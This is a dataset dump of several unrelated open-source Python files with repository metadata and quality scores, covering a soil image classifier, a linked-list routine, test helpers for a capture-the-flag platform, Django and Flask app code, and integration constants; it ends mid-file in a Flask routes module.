max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
---|---|---|---|---|---|---|---|---|---|---|
Image classifier/train.py | anirudha-bs/Farm_assist | 0 | 10300 | from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from keras import regularizers
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import img_to_array, load_img
from keras.preprocessing import image
import os
import numpy as np
import matplotlib.pyplot as plt
# defining classes
def soil(result):
soil_type=""
if result[0]==2:
soil_type="Red soil"
elif result[0]==1:
soil_type="Black soil"
else:
soil_type="Alluvial soil"
return soil_type
# Adding dataset paths
PATH = 'new_datasets'
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
test_dir = os.path.join(PATH, 'test')
train_red_dir = os.path.join(train_dir, 'Red_soil')
validation_red_dir = os.path.join(validation_dir, 'Red_soil')
train_black_dir = os.path.join(train_dir, 'Black_soil')
validation_black_dir = os.path.join(validation_dir, 'Black_soil')
train_all_dir = os.path.join(train_dir, 'Alluvial_soil')
validation_all_dir = os.path.join(validation_dir, 'Alluvial_soil')
num_soil_tr = len(os.listdir(train_red_dir)) + len(os.listdir(train_black_dir)) +len(os.listdir(train_all_dir))
num_soil_val = len(os.listdir(validation_red_dir)) + len(os.listdir(validation_black_dir)) + len((os.listdir(validation_all_dir)))
print("Total training images = ",num_soil_tr)
print("Total validation images = ",num_soil_val)
# hyperparameters
batch_size = 100
epochs = 15
IMG_HEIGHT = 128
IMG_WIDTH = 128
classes_num=3
# data generators
train_image_generator = ImageDataGenerator(rescale=1./255)
validation_image_generator = ImageDataGenerator(rescale=1./255)
train_data_gen = train_image_generator.flow_from_directory(batch_size=batch_size,
directory=train_dir,
shuffle=True,
target_size=(IMG_HEIGHT, IMG_WIDTH),
class_mode='categorical')
val_data_gen = validation_image_generator.flow_from_directory(batch_size=batch_size,
directory=validation_dir,
target_size=(IMG_HEIGHT, IMG_WIDTH),
shuffle=True,
class_mode='categorical')
# defining the model
model = Sequential([
Conv2D(16, 5, activation='relu', input_shape=(IMG_HEIGHT, IMG_WIDTH ,3)),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(32, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(64, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.3),
Flatten(),
Dense(32, activation='relu'),
Dense(classes_num, activation='softmax')
])
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
model.summary()
history = model.fit_generator(
train_data_gen,
steps_per_epoch= num_soil_tr// batch_size,
epochs=epochs,
validation_data=val_data_gen,
validation_steps=num_soil_val // batch_size
)
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(epochs)
# training and validation graphs
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.show()
model.save('new_soil_classify.h5')
# for testing trained model with images differnent class
image_path="red.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
image_path1="black.jpg"
img1 = image.load_img(image_path1, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img1)
img1 = np.expand_dims(img1, axis=0)
result=model.predict_classes(img1)
plt.title(result[0])
plt.show()
image_path="all.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
| from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from keras import regularizers
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import img_to_array, load_img
from keras.preprocessing import image
import os
import numpy as np
import matplotlib.pyplot as plt
# defining classes
def soil(result):
soil_type=""
if result[0]==2:
soil_type="Red soil"
elif result[0]==1:
soil_type="Black soil"
else:
soil_type="Alluvial soil"
return soil_type
# Adding dataset paths
PATH = 'new_datasets'
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
test_dir = os.path.join(PATH, 'test')
train_red_dir = os.path.join(train_dir, 'Red_soil')
validation_red_dir = os.path.join(validation_dir, 'Red_soil')
train_black_dir = os.path.join(train_dir, 'Black_soil')
validation_black_dir = os.path.join(validation_dir, 'Black_soil')
train_all_dir = os.path.join(train_dir, 'Alluvial_soil')
validation_all_dir = os.path.join(validation_dir, 'Alluvial_soil')
num_soil_tr = len(os.listdir(train_red_dir)) + len(os.listdir(train_black_dir)) +len(os.listdir(train_all_dir))
num_soil_val = len(os.listdir(validation_red_dir)) + len(os.listdir(validation_black_dir)) + len((os.listdir(validation_all_dir)))
print("Total training images = ",num_soil_tr)
print("Total validation images = ",num_soil_val)
# hyperparameters
batch_size = 100
epochs = 15
IMG_HEIGHT = 128
IMG_WIDTH = 128
classes_num=3
# data generators
train_image_generator = ImageDataGenerator(rescale=1./255)
validation_image_generator = ImageDataGenerator(rescale=1./255)
train_data_gen = train_image_generator.flow_from_directory(batch_size=batch_size,
directory=train_dir,
shuffle=True,
target_size=(IMG_HEIGHT, IMG_WIDTH),
class_mode='categorical')
val_data_gen = validation_image_generator.flow_from_directory(batch_size=batch_size,
directory=validation_dir,
target_size=(IMG_HEIGHT, IMG_WIDTH),
shuffle=True,
class_mode='categorical')
# defining the model
model = Sequential([
Conv2D(16, 5, activation='relu', input_shape=(IMG_HEIGHT, IMG_WIDTH ,3)),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(32, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(64, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.3),
Flatten(),
Dense(32, activation='relu'),
Dense(classes_num, activation='softmax')
])
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
model.summary()
history = model.fit_generator(
train_data_gen,
steps_per_epoch= num_soil_tr// batch_size,
epochs=epochs,
validation_data=val_data_gen,
validation_steps=num_soil_val // batch_size
)
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(epochs)
# training and validation graphs
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.show()
model.save('new_soil_classify.h5')
# for testing trained model with images differnent class
image_path="red.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
image_path1="black.jpg"
img1 = image.load_img(image_path1, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img1)
img1 = np.expand_dims(img1, axis=0)
result=model.predict_classes(img1)
plt.title(result[0])
plt.show()
image_path="all.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
| en | 0.762645 | # defining classes # Adding dataset paths # hyperparameters # data generators # defining the model # training and validation graphs # for testing trained model with images differnent class | 2.535937 | 3 |
questions/q118_linked_list_loop_removal/code.py | aadhityasw/Competitive-Programs | 0 | 10301 | def removeLoop(head):
ptr = head
ptr2 = head
while True :
if ptr is None or ptr2 is None or ptr2.next is None :
return
ptr = ptr.next
ptr2 = ptr2.next.next
if ptr is ptr2 :
loopNode = ptr
break
ptr = loopNode.next
count = 1
while ptr is not loopNode :
ptr = ptr.next
count += 1
ptr = head
ptr1 = head
ptr2 = head.next
while count > 1 :
ptr2 = ptr2.next
ptr1 = ptr1.next
count -= 1
while ptr is not ptr2 :
ptr = ptr.next
ptr2 = ptr2.next
ptr1 = ptr1.next
ptr1.next = None
| def removeLoop(head):
ptr = head
ptr2 = head
while True :
if ptr is None or ptr2 is None or ptr2.next is None :
return
ptr = ptr.next
ptr2 = ptr2.next.next
if ptr is ptr2 :
loopNode = ptr
break
ptr = loopNode.next
count = 1
while ptr is not loopNode :
ptr = ptr.next
count += 1
ptr = head
ptr1 = head
ptr2 = head.next
while count > 1 :
ptr2 = ptr2.next
ptr1 = ptr1.next
count -= 1
while ptr is not ptr2 :
ptr = ptr.next
ptr2 = ptr2.next
ptr1 = ptr1.next
ptr1.next = None
| none | 1 | 3.824605 | 4 |
|
fastrunner/httprunner3/report/html/gen_report.py | Chankee/AutoTestRunner | 1 | 10302 | <gh_stars>1-10
import io
import os
from datetime import datetime
from jinja2 import Template
from loguru import logger
from httprunner.exceptions import SummaryEmpty
def gen_html_report(summary, report_template=None, report_dir=None, report_file=None):
""" render html report with specified report name and template
Args:
summary (dict): test result summary data
report_template (str): specify html report template path, template should be in Jinja2 format.
report_dir (str): specify html report save directory
report_file (str): specify html report file path, this has higher priority than specifying report dir.
"""
if not summary["time"] or summary["stat"]["testcases"]["total"] == 0:
logger.error(f"test result summary is empty ! {summary}")
raise SummaryEmpty
if not report_template:
report_template = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"template.html"
)
logger.debug("No html report template specified, use default.")
else:
logger.info(f"render with html report template: {report_template}")
logger.info("Start to render Html report ...")
start_at_timestamp = summary["time"]["start_at"]
utc_time_iso_8601_str = datetime.utcfromtimestamp(start_at_timestamp).isoformat()
summary["time"]["start_datetime"] = utc_time_iso_8601_str
if report_file:
report_dir = os.path.dirname(report_file)
report_file_name = os.path.basename(report_file)
else:
report_dir = report_dir or os.path.join(os.getcwd(), "reports")
# fix #826: Windows does not support file name include ":"
report_file_name = "{}.html".format(utc_time_iso_8601_str.replace(":", "").replace("-", ""))
if not os.path.isdir(report_dir):
os.makedirs(report_dir)
report_path = os.path.join(report_dir, report_file_name)
with io.open(report_template, "r", encoding='utf-8') as fp_r:
template_content = fp_r.read()
with io.open(report_path, 'w', encoding='utf-8') as fp_w:
rendered_content = Template(
template_content,
extensions=["jinja2.ext.loopcontrols"]
).render(summary)
fp_w.write(rendered_content)
logger.info(f"Generated Html report: {report_path}")
return report_path
| import io
import os
from datetime import datetime
from jinja2 import Template
from loguru import logger
from httprunner.exceptions import SummaryEmpty
def gen_html_report(summary, report_template=None, report_dir=None, report_file=None):
""" render html report with specified report name and template
Args:
summary (dict): test result summary data
report_template (str): specify html report template path, template should be in Jinja2 format.
report_dir (str): specify html report save directory
report_file (str): specify html report file path, this has higher priority than specifying report dir.
"""
if not summary["time"] or summary["stat"]["testcases"]["total"] == 0:
logger.error(f"test result summary is empty ! {summary}")
raise SummaryEmpty
if not report_template:
report_template = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"template.html"
)
logger.debug("No html report template specified, use default.")
else:
logger.info(f"render with html report template: {report_template}")
logger.info("Start to render Html report ...")
start_at_timestamp = summary["time"]["start_at"]
utc_time_iso_8601_str = datetime.utcfromtimestamp(start_at_timestamp).isoformat()
summary["time"]["start_datetime"] = utc_time_iso_8601_str
if report_file:
report_dir = os.path.dirname(report_file)
report_file_name = os.path.basename(report_file)
else:
report_dir = report_dir or os.path.join(os.getcwd(), "reports")
# fix #826: Windows does not support file name include ":"
report_file_name = "{}.html".format(utc_time_iso_8601_str.replace(":", "").replace("-", ""))
if not os.path.isdir(report_dir):
os.makedirs(report_dir)
report_path = os.path.join(report_dir, report_file_name)
with io.open(report_template, "r", encoding='utf-8') as fp_r:
template_content = fp_r.read()
with io.open(report_path, 'w', encoding='utf-8') as fp_w:
rendered_content = Template(
template_content,
extensions=["jinja2.ext.loopcontrols"]
).render(summary)
fp_w.write(rendered_content)
logger.info(f"Generated Html report: {report_path}")
return report_path | en | 0.515722 | render html report with specified report name and template Args: summary (dict): test result summary data report_template (str): specify html report template path, template should be in Jinja2 format. report_dir (str): specify html report save directory report_file (str): specify html report file path, this has higher priority than specifying report dir. # fix #826: Windows does not support file name include ":" | 2.766206 | 3 |
SD/lab1/client.py | matheuscr30/UFU | 0 | 10303 | #client.py
#!/usr/bin/python # This is client.py file
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12352 # Reserve a port for your service.
s.connect((host, port))
while True:
message = input('Digite mensagem: ')
s.send(bytes(message, encoding='utf8'))
if message == 'SAIR':
breaks
print('Mensagem enviada.')
print('Esperando resposta.')
answer = s.recv(1024).decode('utf8')
print('Resposta recebida: ' + answer)
print('Desconectando.')
s.close()
| #client.py
#!/usr/bin/python # This is client.py file
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12352 # Reserve a port for your service.
s.connect((host, port))
while True:
message = input('Digite mensagem: ')
s.send(bytes(message, encoding='utf8'))
if message == 'SAIR':
breaks
print('Mensagem enviada.')
print('Esperando resposta.')
answer = s.recv(1024).decode('utf8')
print('Resposta recebida: ' + answer)
print('Desconectando.')
s.close()
| en | 0.573668 | #client.py #!/usr/bin/python # This is client.py file # Import socket module # Create a socket object # Get local machine name # Reserve a port for your service. | 3.410321 | 3 |
tests/helpers.py | ws4/TopCTFd | 1 | 10304 | <reponame>ws4/TopCTFd
from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
def create_ctfd(ctf_name="CTFd", name="admin", email="<EMAIL>", password="password", setup=True):
app = create_app('CTFd.config.TestingConfig')
if setup:
with app.app_context():
with app.test_client() as client:
data = {}
r = client.get('/setup') # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/setup', data=data)
return app
def destroy_ctfd(app):
drop_database(app.config['SQLALCHEMY_DATABASE_URI'])
def register_user(app, name="user", email="<EMAIL>", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/register')
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/register', data=data)
def login_as_user(app, name="user", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/login')
with client.session_transaction() as sess:
data = {
"name": name,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/login', data=data)
return client
def get_scores(user):
scores = user.get('/scores')
scores = json.loads(scores.get_data(as_text=True))
return scores['standings']
def gen_challenge(db, name='chal_name', description='chal_description', value=100, category='chal_category', type=0):
chal = Challenges(name, description, value, category)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, teamid, name="award_name", value=100):
award = Awards(teamid, name, value)
db.session.add(award)
db.session.commit()
return award
def gen_tag(db, chal, tag='tag_tag'):
tag = Tags(chal, tag)
db.session.add(tag)
db.session.commit()
return tag
def gen_file():
pass
def gen_flag(db, chal, flag='flag', key_type=0):
key = Keys(chal, flag, key_type)
db.session.add(key)
db.session.commit()
return key
def gen_team(db, name='name', email='<EMAIL>', password='password'):
team = Teams(name, email, password)
db.session.add(team)
db.session.commit()
return team
def gen_hint(db, chal, hint="This is a hint", cost=0, type=0):
hint = Hints(chal, hint, cost, type)
db.session.add(hint)
db.session.commit()
return hint
def gen_solve(db, teamid, chalid, ip='127.0.0.1', flag='rightkey'):
solve = Solves(teamid, chalid, ip, flag)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
return solve
def gen_wrongkey(db, teamid, chalid, ip='127.0.0.1', flag='wrongkey'):
wrongkey = WrongKeys(teamid, chalid, ip, flag)
wrongkey.date = datetime.datetime.utcnow()
db.session.add(wrongkey)
db.session.commit()
return wrongkey
def gen_tracking(db, ip, team):
tracking = Tracking(ip, team)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, route, html):
page = Pages(route, html)
db.session.add(page)
db.session.commit()
return page
| from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
def create_ctfd(ctf_name="CTFd", name="admin", email="<EMAIL>", password="password", setup=True):
app = create_app('CTFd.config.TestingConfig')
if setup:
with app.app_context():
with app.test_client() as client:
data = {}
r = client.get('/setup') # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/setup', data=data)
return app
def destroy_ctfd(app):
drop_database(app.config['SQLALCHEMY_DATABASE_URI'])
def register_user(app, name="user", email="<EMAIL>", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/register')
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/register', data=data)
def login_as_user(app, name="user", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/login')
with client.session_transaction() as sess:
data = {
"name": name,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/login', data=data)
return client
def get_scores(user):
scores = user.get('/scores')
scores = json.loads(scores.get_data(as_text=True))
return scores['standings']
def gen_challenge(db, name='chal_name', description='chal_description', value=100, category='chal_category', type=0):
chal = Challenges(name, description, value, category)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, teamid, name="award_name", value=100):
award = Awards(teamid, name, value)
db.session.add(award)
db.session.commit()
return award
def gen_tag(db, chal, tag='tag_tag'):
tag = Tags(chal, tag)
db.session.add(tag)
db.session.commit()
return tag
def gen_file():
pass
def gen_flag(db, chal, flag='flag', key_type=0):
key = Keys(chal, flag, key_type)
db.session.add(key)
db.session.commit()
return key
def gen_team(db, name='name', email='<EMAIL>', password='password'):
team = Teams(name, email, password)
db.session.add(team)
db.session.commit()
return team
def gen_hint(db, chal, hint="This is a hint", cost=0, type=0):
hint = Hints(chal, hint, cost, type)
db.session.add(hint)
db.session.commit()
return hint
def gen_solve(db, teamid, chalid, ip='127.0.0.1', flag='rightkey'):
solve = Solves(teamid, chalid, ip, flag)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
return solve
def gen_wrongkey(db, teamid, chalid, ip='127.0.0.1', flag='wrongkey'):
wrongkey = WrongKeys(teamid, chalid, ip, flag)
wrongkey.date = datetime.datetime.utcnow()
db.session.add(wrongkey)
db.session.commit()
return wrongkey
def gen_tracking(db, ip, team):
tracking = Tracking(ip, team)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, route, html):
page = Pages(route, html)
db.session.add(page)
db.session.commit()
return page | en | 0.799536 | # Populate session with nonce | 2.569187 | 3 |
homeassistant/components/kaiterra/const.py | MrDelik/core | 30,023 | 10305 | """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"
AQI_SCALE = {
"cn": [0, 50, 100, 150, 200, 300, 400, 500],
"in": [0, 50, 100, 200, 300, 400, 500],
"us": [0, 50, 100, 150, 200, 300, 500],
}
AQI_LEVEL = {
"cn": [
"Good",
"Satisfactory",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
"in": [
"Good",
"Satisfactory",
"Moderately polluted",
"Poor",
"Very poor",
"Severe",
],
"us": [
"Good",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
}
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
AVAILABLE_UNITS = [
"x",
PERCENTAGE,
"C",
"F",
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
| """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"
AQI_SCALE = {
"cn": [0, 50, 100, 150, 200, 300, 400, 500],
"in": [0, 50, 100, 200, 300, 400, 500],
"us": [0, 50, 100, 150, 200, 300, 500],
}
AQI_LEVEL = {
"cn": [
"Good",
"Satisfactory",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
"in": [
"Good",
"Satisfactory",
"Moderately polluted",
"Poor",
"Very poor",
"Severe",
],
"us": [
"Good",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
}
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
AVAILABLE_UNITS = [
"x",
PERCENTAGE,
"C",
"F",
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
| en | 0.595333 | Consts for Kaiterra integration. | 1.72613 | 2 |
support/views.py | bhagirath1312/ich_bau | 1 | 10306 | <filename>support/views.py
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
def index( request ):
sp = SupportProject.objects.all()
if sp.count() == 1:
return HttpResponseRedirect( sp.first().project.get_absolute_url() )
else:
context_dict = { 'sps' : sp, }
return render( request, 'support/index.html', context_dict )
| <filename>support/views.py
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
def index( request ):
sp = SupportProject.objects.all()
if sp.count() == 1:
return HttpResponseRedirect( sp.first().project.get_absolute_url() )
else:
context_dict = { 'sps' : sp, }
return render( request, 'support/index.html', context_dict )
| en | 0.968116 | # Create your views here. | 1.819845 | 2 |
timeline/models.py | KolibriSolutions/BepMarketplace | 1 | 10307 | <gh_stars>1-10
# Bep Marketplace ELE
# Copyright (c) 2016-2021 Kolibri Solutions
# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE
#
from datetime import datetime
from django.core.exceptions import ValidationError
from django.db import models
class TimeSlot(models.Model):
"""
A timeslot is a year in which the current BEP runs. It consists of multiple timephases.
"""
Name = models.CharField(max_length=250)
Begin = models.DateField()
End = models.DateField()
def __str__(self):
return self.Name
def clean(self):
if not self.Begin or not self.End:
raise ValidationError('Please fill in all required fields.')
if self.Begin > self.End:
raise ValidationError("End date should be larger than begin date")
class Meta:
ordering = ["Begin"]
def is_finished(self):
return self.End < datetime.now().date()
class TimePhase(models.Model):
"""
A time phase is a phase the system is in. Each phase has its own pages and permissions.
"""
Types = (
(1, "Generating project proposals"),
(2, "Projects quality check"),
(3, "Students choosing projects"),
(4, "Distribution of projects"),
(5, "Gather and process objections"),
(6, "Execution of the projects"),
(7, "Presentation of results"),
)
Description = models.IntegerField(choices=Types)
Begin = models.DateField()
End = models.DateField()
CountdownEnd = models.DateField(null=True, blank=True,
help_text='Fake end date, to set the homepage clock to an earlier date. '
'A trick to motivate people.')
TimeSlot = models.ForeignKey(TimeSlot, on_delete=models.PROTECT, related_name="timephases")
def __str__(self):
return self.Types[self.Description - 1][1] + " in " + str(self.TimeSlot)
def clean(self):
if not self.Begin or not self.End or not hasattr(self, 'TimeSlot'):
raise ValidationError('Please fill in all required fields.')
if self.Begin > self.End:
raise ValidationError("End date should be larger than begin date")
if not (self.TimeSlot.Begin <= self.Begin <= self.TimeSlot.End):
raise ValidationError("Begin date should be in time slot {}".format(self.TimeSlot))
if not (self.TimeSlot.Begin <= self.End <= self.TimeSlot.End):
raise ValidationError("End date should be in time slot {}".format(self.TimeSlot))
if self.TimeSlot.timephases.filter(Description=self.Description).exists():
if self.TimeSlot.timephases.get(Description=self.Description) != self:
raise ValidationError("Time slot {} already has time phase {}".format(self.TimeSlot, self.Description))
class Meta:
ordering = ['TimeSlot', 'Begin']
| # Bep Marketplace ELE
# Copyright (c) 2016-2021 Kolibri Solutions
# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE
#
from datetime import datetime
from django.core.exceptions import ValidationError
from django.db import models
class TimeSlot(models.Model):
"""
A timeslot is a year in which the current BEP runs. It consists of multiple timephases.
"""
Name = models.CharField(max_length=250)
Begin = models.DateField()
End = models.DateField()
def __str__(self):
return self.Name
def clean(self):
if not self.Begin or not self.End:
raise ValidationError('Please fill in all required fields.')
if self.Begin > self.End:
raise ValidationError("End date should be larger than begin date")
class Meta:
ordering = ["Begin"]
def is_finished(self):
return self.End < datetime.now().date()
class TimePhase(models.Model):
"""
A time phase is a phase the system is in. Each phase has its own pages and permissions.
"""
Types = (
(1, "Generating project proposals"),
(2, "Projects quality check"),
(3, "Students choosing projects"),
(4, "Distribution of projects"),
(5, "Gather and process objections"),
(6, "Execution of the projects"),
(7, "Presentation of results"),
)
Description = models.IntegerField(choices=Types)
Begin = models.DateField()
End = models.DateField()
CountdownEnd = models.DateField(null=True, blank=True,
help_text='Fake end date, to set the homepage clock to an earlier date. '
'A trick to motivate people.')
TimeSlot = models.ForeignKey(TimeSlot, on_delete=models.PROTECT, related_name="timephases")
def __str__(self):
return self.Types[self.Description - 1][1] + " in " + str(self.TimeSlot)
def clean(self):
if not self.Begin or not self.End or not hasattr(self, 'TimeSlot'):
raise ValidationError('Please fill in all required fields.')
if self.Begin > self.End:
raise ValidationError("End date should be larger than begin date")
if not (self.TimeSlot.Begin <= self.Begin <= self.TimeSlot.End):
raise ValidationError("Begin date should be in time slot {}".format(self.TimeSlot))
if not (self.TimeSlot.Begin <= self.End <= self.TimeSlot.End):
raise ValidationError("End date should be in time slot {}".format(self.TimeSlot))
if self.TimeSlot.timephases.filter(Description=self.Description).exists():
if self.TimeSlot.timephases.get(Description=self.Description) != self:
raise ValidationError("Time slot {} already has time phase {}".format(self.TimeSlot, self.Description))
class Meta:
ordering = ['TimeSlot', 'Begin'] | en | 0.894238 | # Bep Marketplace ELE # Copyright (c) 2016-2021 Kolibri Solutions # License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE # A timeslot is a year in which the current BEP runs. It consists of multiple timephases. A time phase is a phase the system is in. Each phase has its own pages and permissions. | 2.632571 | 3 |
app/api/user_routes.py | nappernick/envelope | 2 | 10308 | from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
@user_routes.route("/types")
def types():
types = db.session.query(Type).all()
return jsonify([type.name_to_id() for type in types])
@user_routes.route('/')
@login_required
def users():
users = db.session.query(User).all()
return jsonify([user.to_dict_full() for user in users])
@user_routes.route('/<int:id>')
@login_required
def user(id):
user = User.query.get(id)
return user.to_dict()
@user_routes.route('/<int:id>', methods=["DELETE"])
